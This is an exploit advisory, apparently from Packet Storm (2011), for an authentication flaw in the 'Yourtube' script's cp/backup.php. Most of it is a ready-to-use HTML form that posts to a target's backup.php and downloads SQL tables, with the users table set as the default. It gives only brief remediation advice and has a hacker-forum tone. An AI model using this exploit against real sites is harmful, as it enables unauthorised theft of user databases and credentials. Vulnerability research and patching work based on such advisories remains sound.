Yourtube Database Download

2011-03-14T00:00:00
ID PACKETSTORM:99274
Type packetstorm
Reporter Eg-R1z
Modified 2011-03-14T00:00:00

Description

                                        
                                            ` - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
| Exploit Title : Yourtube Sql table download vuln  
| Auther : Eg-R1z  
| Home : black-hat.cc , sec4ever.com  
| contact : Get me @ the above sites > i-Hmx  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
| script name : Yourtube  
| version : 1.0 , 2.0 don't know abt v3 but it's maybe affected also  
| Dork : just find ur own one  
| Vulnerability : due to stupid confirmation rule on cp/backup.php file  
| Quick sollution:-  
| Coder rule : Applying strong login confirmation rule on backup.php file  
| User rule : firewall on the cp directory seem 2 B enough  
| > Update to newer version < v4 is preferred >  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
  
- - - - - - - - - - - - - - - - - - Exploit Code <html> - - - - - - - - - - - - - - - - - - - -  
<html dir="rtl">  
<head>  
<style type="text/css">  
<!--  
.style1 {color: #FF0000}  
.style2 {  
color: #0000FF;  
font-weight: bold;  
}  
-->  
</style>  
<title>YourTube Sql tables Download Exploit - HaCKeR-MaN</title><div>  
</TD></TR>  
</TABLE>  
</td>  
<td width="100%" height="327" align="center" valign="top">  
<TABLE align="center" dir="ltr" WIDTH=97% BORDER=0 CELLPADDING=0 CELLSPACING=0 height="23">  
<TR>  
<TD dir="rtl" bgcolor="#FFFFFF" align="center" valign="top" height="19" width="959">  
<div align="center">  
<form name="a" action=""  
method="post" name="formw" onsubmit="document.a.action = document.a.site.value+'/backup.php';document.a.submit">  
</div>  
<p align="center"><strong>YourTube Sql tables Download Exploit</strong></p>  
<p align="center"><strong>Coded By <span class="style1">HaCKeR-MaN</span></strong></p>  
<p align="center"><strong>Black-hat.cc , sec4ever.com </strong></p>  
<p align="center" class="style2">Target Url </p>  
<p align="center">  
<input name="action" type="hidden" value="yes">  
<input name="site" type="text" value="http://target/path/cp" size="35" align="left">  
</p>  
<p align="center" class="style2">Table name </p>  
<p align="center">  
<input type="text" name="tablen[]" value="ac4pcom_users" size=35 />  
</p>  
<p align="center"><br>  
<input type="submit" name="submit2" class="buttons" value="Get it" />  
</form>  
</p></TD></TR>  
</td>  
</tr>  
</center>  
</div>  
</body>  
</html>  
  
- - - - - - - - - - - - - - - - - - End of the shit - - - - - - - - - - - - - - - - - - - -  
`